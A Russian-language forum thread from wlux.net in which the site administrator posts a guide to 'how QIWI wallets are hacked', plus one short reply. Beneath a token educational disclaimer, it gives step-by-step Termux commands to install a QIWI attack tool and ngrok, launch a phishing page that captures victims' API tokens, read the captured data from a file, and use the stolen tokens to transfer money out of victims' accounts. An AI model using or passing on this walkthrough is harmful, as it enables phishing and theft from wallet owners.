• Добро пожаловать на сайт - wlux.net!

    FAQ по форуму

    1. Все сообщения до группы местный проходят модерацию от 1 минуты до 24 часа

    2. Сообщения учитываються в следующих разделах: Читать

    3.Что-бы скачать вложение нужно 2 сообщения.

    4.Личные переписки работают только с Администрацией форума

    5. Запрещено: Просить скрытый текст , спам, реклама, скам, ддос, кардинг и другая чернуха, нарушать любые законы РФ/СНГ = бан аккаунта

    6. Внимание! Мы не удаляем аккаунты с форума! Будьте внимательны ДО регистрации! Как удалить аккаунт на форуме?!

    5.Не понимаю, как и что тут работает у вас?!Как создавать темы, писать сообщения, как получать реакции. Почему не засчитывает сообщения. Все ответы здесь

This is a mobile optimized page that loads fast, if you want to load the real page, click this text.

Гайд Как взламывают QIWI в 2022 году, подробное объяснение

Оффлайн

wlux.net

Где волчьи уши, там волчьи зубы.
Команда форума
LV
7
 
20.06.2022
23 849
218
36
Награды
10
Пол
Муж.

Репутация:

  • Автор темы
  • Администратор
  • Модератор
  • Команда форума
  • #1


В этой статье мы затронем тему безопасности Qiwi-кошельков, а именно, как злоумышленник может нагло стырить деньги с вашего счёта.

Но всё это исключительно в целях предостеречь вас от взлома, а не научить взламывать чужие аккаунты.

ДИСКЛЕЙМЕР:

Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!


Установка:​

Начнём с установки. Её можно произвести даже в Termux.

Сначала ставим необходимые для работы пакеты:

Код:
apt update
apt install git -y
apt install python -y
apt install php -y
apt install libgnutls -y
pip install colorama
pip install SimpleQIWI

Далее качаем репозиторий:

Код:
git clone https://github.com/TermuxGuide/qiwi

Установка ngrok (для фишинга):​

Код:
git clone https://github.com/tchelospy/termux-ngrok
cd termux-ngrok
bash termux-ngrok.sh
cd /home

Запуск:​

Переходим в директорию и запускаем:
Код:
cd qiwi
python qiwi.py



Использование:​

В программе имеется 3 пункта для атаки:

[1] QIWI API (web version) | веб версия
[2] QIWI API (terminal) | в терминале
[3] Fishing fake site | фишинг
Первый пункт позволяет запустить веб-версию управления счётом через Qiwi API.

Qiwi API - Это специальный токен, который можно раздобыть в настройках своего Qiwi-кошелька.

Вводим необходимые данные для перевода в соответствующие строки и наблюдаем за успешным переводом:


Второй пункт отличается лишь способом управления:



Третий пункт - фишинг.

С помощью него можно создать фейковую страницу, чтобы узнать токен жертвы для использования первых двух пунктов.

Запускаем фишинг, а в другом терминале ngrok:

Переходим по получившейся ссылке в ngrok и видим такую шнягу:







(Если у вас не отображается ссылка на ngrok - попробуйте включить точку доступа и запустить заново)

Когда жертва введёт свои данные, они отобразятся в терминале.

Либо запускаем новую сессию и смотрим файл, в который сохраняются данные:

Код:
cd
cd qiwi_api
cd fish
cat counter.txt

 
Оффлайн

TDerCrafting 

Проверенный
Местный
LV
0
 
10.12.2022
40
7
2
Награды
1
23

Репутация:

Вот почему я никогда не заведу киви кошелёк
 

Поиск по форуму

Похожие темы:

Ответы
21
Просмотры
501
Данный сайт использует cookie. Вы должны принять их для продолжения использования. Узнать больше....